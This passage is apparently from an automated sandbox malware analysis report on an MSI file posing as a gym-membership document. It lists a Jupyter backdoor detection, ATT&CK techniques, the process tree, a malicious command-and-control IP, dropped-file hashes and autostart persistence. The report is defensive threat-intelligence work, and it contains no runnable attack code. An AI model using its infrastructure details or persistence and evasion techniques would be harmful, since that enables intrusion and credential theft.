                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Code function: 6_2_017ED868 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Code function: 6_2_018993B0 _free,GetTimeZoneInformation,_free
                        Source: C:\Windows\System32\msiexec.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

                        Stealing of Sensitive Information:

                        Yara detected Jupyter backdoor
                        Source: Yara match File source: 21.2.powershell.exe.273b1806fc8.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 21.2.powershell.exe.273b1806fc8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 21.2.powershell.exe.273c9b50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 21.2.powershell.exe.273c9b50000.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR

                        Remote Access Functionality:

                        Yara detected Jupyter backdoor
                        Source: Yara match File source: 21.2.powershell.exe.273b1806fc8.0.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 21.2.powershell.exe.273b1806fc8.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 21.2.powershell.exe.273c9b50000.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 21.2.powershell.exe.273c9b50000.1.unpack, type: UNPACKEDPE
                        Source: Yara match File source: 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR

                        Mitre Att&ck Matrix

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Replication Through Removable Media 1 | Command and Scripting Interpreter 1 | Startup Items 1 | Startup Items 1 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 2 | Replication Through Removable Media 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | PowerShell 3 | DLL Side-Loading 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | LSASS Memory | Peripheral Device Discovery 11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | At (Linux) | Windows Service 1 | Windows Service 1 | File Deletion 1 | Security Account Manager | File and Directory Discovery 3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 13 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | At (Windows) | Registry Run Keys / Startup Folder 12 | Process Injection 12 | Masquerading 21 | NTDS | System Information Discovery 16 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                        Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder 12 | Modify Registry 1 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 21 | Cached Domain Credentials | Security Software Discovery 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 12 | DCSync | Process Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Regsvr32 1 | Proc Filesystem | Virtualization/Sandbox Evasion 21 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                        Behavior Graph

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        Behavior Graph ID: 496721, Sample: Nyship-Empire-Plan-Gym-Memb..., Startdate: 04/10/2021, Architecture: WINDOWS, Score: 100
                        Signatures: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 7 other signatures
                        • msiexec.exe (started)
                            dropped: C:\Users\...\PDFsamEnhanced7Installer.exe (PE32); C:\Windows\Installer\MSI113A.tmp (data); C:\Windows\Installer\5206aa.msi (Composite); 10 other files (2 malicious)
                            • msiexec.exe (started)
                                signatures: Suspicious powershell command line found
                                • powershell.exe (started)
                                    network: 146.70.41.157, 49816, 49828, 80, TENET-1ZA, United Kingdom
                                    dropped: C:\...\VNFnzYSLqGlsm.avQNMKtfDhAeUdoRmXu (DOS); PowerShell_transcr....20211004212820.txt (UTF-8); C:\...\zvXKQZSqLfmIYkHorsF.SyKvELgGXcBhboYqjD (data); 279 other malicious files
                                    signatures: Writes many files with high entropy; Powershell creates an autostart link
                                    • conhost.exe (started)
                                • PDFsamEnhanced7Installer.exe (started)
                                    network: wsgeoip.pdfsam.org 64.15.159.234, 443, 49781, 49785, IWEB-ASCA, Canada; 127.0.0.1 unknown unknown; api-updateservice.pdfsam.org
                                    dropped: C:\...\PDFsam_Enhanced_7_Installer.exe (PE32); C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506 (Microsoft); C:\ProgramData\...\Statistics.dll (PE32)
                                    signatures: Multi AV Scanner detection for dropped file
                                    • regsvr32.exe (started)
                                    • PDFsam_Enhanced_7_Installer.exe (started)
                            • msiexec.exe (started)
                            • msiexec.exe (started)
                        • msiexec.exe (started)
                            dropped: C:\Users\user\AppData\Local\Temp\MSI60E.tmp (PE32+); C:\Users\user\AppData\Local\Temp\MSI5DE.tmp (PE32+); C:\Users\user\AppData\Local\Temp\MSI35C.tmp (PE32+); C:\Users\user\AppData\Local\...\MSI29D3.tmp (PE32+)
                            signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
                        • powershell.exe (started)
                            • conhost.exe (started)

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        Source | Detection | Scanner | Label | Link
                        Nyship-Empire-Plan-Gym-Membership.msi | 12% | Virustotal | | Browse

                        Dropped Files

                        Source | Detection | Scanner | Label | Link
                        C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe | 6% | Metadefender | | Browse
                        C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe | 20% | ReversingLabs | Win32.PUA.Generic |
                        C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll | 0% | Metadefender | | Browse
                        C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll | 4% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\MSI29D3.tmp | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\MSI35C.tmp | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\MSI5DE.tmp | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Local\Temp\MSI60E.tmp | 0% | ReversingLabs | |
                        C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe | 6% | Metadefender | | Browse
                        C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe | 20% | ReversingLabs | Win32.PUA.Generic |
                        C:\Windows\Installer\MSI11D7.tmp | 0% | ReversingLabs | |
                        C:\Windows\Installer\MSI1265.tmp | 0% | ReversingLabs | |
                        C:\Windows\Installer\MSI1A75.tmp | 0% | ReversingLabs | |
                        C:\Windows\Installer\MSI26BB.tmp | 0% | ReversingLabs | |
                        C:\Windows\Installer\MSI294D.tmp | 0% | ReversingLabs | |
                        C:\Windows\Installer\MSID20.tmp | 0% | ReversingLabs | |
                        C:\Windows\Installer\MSIEE6.tmp | 0% | ReversingLabs | |
                        C:\Windows\Installer\MSIF74.tmp | 0% | ReversingLabs | |

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs


                        Domains and IPs

                        Contacted Domains

                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        api-updateservice.pdfsam.org | 64.15.159.234 | true | false | | high
                        wsgeoip.pdfsam.org | 64.15.159.234 | true | false | | high

                            Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://146.70.41.157 | true | Virustotal: 4%; Avira URL Cloud: safe | unknown
                        http://146.70.41.157/ | true | Avira URL Cloud: safe | unknown

                            URLs from Memory and Binaries

                                                                                    http://www.cert.fnmt.es/dpcs/PDFsamEnhanced7Installer.exe, 00000006.00000003.689677218.0000000004A2F000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.quovadis.bm0PDFsamEnhanced7Installer.exe, 00000006.00000003.696206732.0000000004A20000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://eca.hinet.net/repository0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://crl.ssc.lt/root-a/cacrl.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://certs.oaticerts.com/repository/OATICA2.crlPDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.trustdst.com/certificates/policy/ACES-index.html0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://certs.oati.net/repository/OATICA2.crt0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.accv.es00PDFsamEnhanced7Installer.exe, 00000006.00000003.689712753.0000000004A11000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.pkioverheid.nl/policies/root-policy-G20PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://www.netlock.net/docsPDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.e-trust.be/CPS/QNcertsPDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://ocsp.ncdc.gov.sa0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://tempuri.org/http://tempuri.org/MessagedescriptioncpudatadataPDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://web.ncdc.gov.sa/crl/nrcaparta1.crlPDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.datev.de/zertifikat-policy-int0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                                            high

                                                                                            Contacted IPs

                                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
146.70.41.157 | unknown | United Kingdom | 2018 | TENET-1ZA | true
64.15.159.234 | api-updateservice.pdfsam.org | Canada | 32613 | IWEB-ASCA | false

                                                                                            Private

                                                                                            IP
                                                                                            127.0.0.1

                                                                                            General Information

                                                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                                                            Analysis ID:496721
                                                                                            Start date:04.10.2021
                                                                                            Start time:21:27:11
                                                                                            Joe Sandbox Product:CloudBasic
                                                                                            Overall analysis duration:0h 11m 49s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Sample file name:Nyship-Empire-Plan-Gym-Membership.msi
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                            Number of analysed new started processes analysed:23
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • HDC enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Detection:MAL
                                                                                            Classification:mal100.rans.troj.evad.winMSI@19/326@2/3
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 33.3%
                                                                                            HDC Information:Failed
                                                                                            HCA Information:Failed
                                                                                            Cookbook Comments:
                                                                                            • Adjust boot time
                                                                                            • Enable AMSI
                                                                                            • Found application associated with file extension: .msi
                                                                                            Warnings:
                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 23.203.141.148, 2.20.178.56, 2.20.178.10, 20.49.157.6, 93.184.221.240, 67.27.233.126, 8.253.204.249, 8.248.139.254, 8.248.141.254, 8.248.131.254, 13.107.246.254, 13.107.3.254, 20.54.110.249, 52.251.79.25, 40.112.88.60
                                                                                            • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, s-ring.msedge.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, t-ring.msedge.net, s-ring.s-9999.s-msedge.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, store-images.s-microsoft.com, s-9999.s-msedge.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, t-ring.t-9999.t-msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                            • Execution Graph export aborted for target PDFsam_Enhanced_7_Installer.exe, PID 7016 because there are no executed function
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.

                                                                                            Simulations

                                                                                            Behavior and APIs

Time | Type | Description
21:28:18 | API Interceptor | 2x Sleep call for process: PDFsamEnhanced7Installer.exe modified
21:28:21 | API Interceptor | 121x Sleep call for process: powershell.exe modified
21:28:55 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aceef8ac0de486b7cbb4c345e0d7f.LNk

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

Match | Associated Sample Name / URL | Detection
64.15.159.234 | Sample-Rfp-Evaluation-Criteria.exe | malicious
64.15.159.234 | Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe | malicious

                                                                                                Domains

Match | Associated Sample Name / URL | Detection | Context
api-updateservice.pdfsam.org | Sample-Rfp-Evaluation-Criteria.exe | malicious | 64.15.159.234
api-updateservice.pdfsam.org | Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe | malicious | 64.15.159.234
wsgeoip.pdfsam.org | Sample-Rfp-Evaluation-Criteria.exe | malicious | 64.15.159.234
wsgeoip.pdfsam.org | Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe | malicious | 64.15.159.234

                                                                                                ASN

                                                                                                JA3 Fingerprints

                                                                                                Match: 37f463bf4616ecd445d4a1937da06e19

                                                                                                Dropped Files

                                                                                                Match: C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll
                                                                                                Associated Sample Name / URL:
                                                                                                • Sample-Rfp-Evaluation-Criteria.exe, Detection: malicious
                                                                                                • Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe, Detection: malicious

                                                                                                    Created / dropped Files

                                                                                                    C:\Config.Msi\5206a9.rbs
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):878019
                                                                                                    Entropy (8bit):6.348387727408553
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:YLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rn:YLwqsBcLDe+u2lkEWl7DCGCfT
                                                                                                    MD5:AA0CFA9123C3CC4227F93FB7C9CD6668
                                                                                                    SHA1:C28541987EEE1A3A75ACAF23588D0B1BB0A4CE93
                                                                                                    SHA-256:70878FD3A0F4B93F2AD81F1DF2E2CDF48C68397F19AF62591A4F9759284B17D3
                                                                                                    SHA-512:638EFC41324C762DEABCEAF3A903F3CDA53889066A8D674C63FB4D40E3E2D44D4EBA93C53CEA2A500026CE8AF60F0FFDA88640E9AB98BC90B059D46D2EB1FE48
                                                                                                    Malicious:false
                                                                                                    Preview: ...@IXOS.@.....@..DS.@.....@.....@.....@.....@.....@......&.{92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}..(EMCO EVALUATION PACKAGE) - V2%.Nyship-Empire-Plan-Gym-Membership.msi.@.....@.....@.....@........&.{549A417F-BD1F-4387-A76F-A86CCEF6964C}.....@.....@.....@.....@.......@.....@.....@.......@......(EMCO EVALUATION PACKAGE) - V2......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ECA_InstallRollbackL...ECA_InstallRollback.@.......C..MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0........
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16852824
                                                                                                    Entropy (8bit):6.81149936180454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:393216:6tGKFBfXhHQiYxSoJQCCdzlQEblI2rqNCFnWZYLjDkQ:kDFBfRgxS+CvQmIynWZRQ
                                                                                                    MD5:801B1B11E979AF812CA4387E5F438AD8
                                                                                                    SHA1:180EF9CF27EB259954D2225B0621408A1E1F3F5E
                                                                                                    SHA-256:81F0C9FFF344742455596A5062FD6875B28BD9981469575164DF942F1C9AD2B2
                                                                                                    SHA-512:2E14902BE3B577A06E0A93700F2EB7E27EDF6F348958B8BD59F1FF9B3709AAF56AFE4BCB7224D0EDD6033308CD71ECF6744DD5782FD62F41859EB404F3212D96
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Metadefender, Detection: 6%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:modified
                                                                                                    Size (bytes):2798912
                                                                                                    Entropy (8bit):6.708611547038991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:WebZrnP1wK+J+d1BWQgua2ag6yi8tUd9KWrLjsZuIJFoixkAREkVdJxospg:VbzL+Jc1YTua2fs91XjsZumoixPC
                                                                                                    MD5:417F5C1E34D2ABC002301BA08C546B6D
                                                                                                    SHA1:834A9410DA82FECBCB00E641FB403919EC11F3B9
                                                                                                    SHA-256:2AEE68C1D66E0BD7741DBE002719C71017094FE3BB506F75AAA859815A089329
                                                                                                    SHA-512:CB2F38D22025CFB4F276691E1E10EAE47B659B6375F8CBA7366BA6A7EC2384B5886764913CA69E274EC000133276B8FBDDC33A8567DD576F3E498429B69CE605
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Sample-Rfp-Evaluation-Criteria.exe, Detection: malicious, Browse
                                                                                                    • Filename: Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe, Detection: malicious, Browse
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\curl-ca-bundle.crt
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):222997
                                                                                                    Entropy (8bit):6.025672250373848
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:QflGUhzIjom0UMwo6J7gZ7IvqT3x9BYv0yvAvVT/mRR283rz9KKbWqI+CyrGj4J4:16m0Yo+kZbqcBdbgF8+yaU5R5iSYxM
                                                                                                    MD5:1E32496378E8FEE43CB01B0689963A67
                                                                                                    SHA1:1D4CE2B3DD7F71F4725E6A030D6E25B8A4731508
                                                                                                    SHA-256:5B47AEE36F594B7737E00990C9922A87252729B74CC2F1A83C0FCEED9816BDB9
                                                                                                    SHA-512:80339D47B383EE0BCE769E3723FB2AA1925E6963325733FC12435138F98C996912851792C8EA451ED3EFF66E1B74DEE984662F759E894F5A663115FCB4005253
                                                                                                    Malicious:false
                                                                                                    Preview: ##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Wed Jan 23 04:12:09 2019 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.27...## SHA256: 18372117493b5b7ec006c31d966143fc95a9464a2b5f8d5188e23c5557b2292d..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\logs\log.ERROR.20211004-212849.616
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170
                                                                                                    Entropy (8bit):5.014395426216142
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:2J9btYQMfDFJSEsE1DLrrFJHIWCyRVB2NfWTTwFFT0Jgy5ziaXy:krMmE1f1JHIWC02NcMFptgzzXy
                                                                                                    MD5:3748FEAE1468A3AE61F1C3D0BC223C76
                                                                                                    SHA1:D0A3519079C2F7F1E9D4A39375C4F1961C655022
                                                                                                    SHA-256:F38402313D72F648AA2DFEFF9DA07DD3EB430B3AB61A44AC0CDF22FA62F730CE
                                                                                                    SHA-512:76D3448797F02EC0D8732525FBC8B19413117CA3FC9D6B39261E3D29E97F20CC71101182DF3DC39F14F4EA9E3E3DCF8E6A7A873DB96F06A915447DD76E71AAE8
                                                                                                    Malicious:false
                                                                                                    Preview: Log file created at: 2021/10/04 21:28:49..Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg..E1004 21:28:49.666409 6476 Updater.cpp:270] unknow error..
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\logs\log.INFO.20211004-212818.616
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):244
                                                                                                    Entropy (8bit):5.139888586095511
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:krMsE1f1JHIWC/NOClJghASS92NcMFptgzzXy:D9vIWWOPNUocyEy
                                                                                                    MD5:0556B002640495E5B9BB79181A8293AB
                                                                                                    SHA1:6893FF716F3C8D06B37AE4041C002C702E49FEC6
                                                                                                    SHA-256:D3F1374AE83464E4885BF392073D22CFF9AEA856CC2673C10D22F5515E6874C9
                                                                                                    SHA-512:ACCB916B2F1E2A4893FAFA19C27B0D4DEDCE95A05F03E87445282075F9725D9A10AD9547552819BF4F512F26E243B2ED97AECC92684E93AE6378AF1361C533DA
                                                                                                    Malicious:false
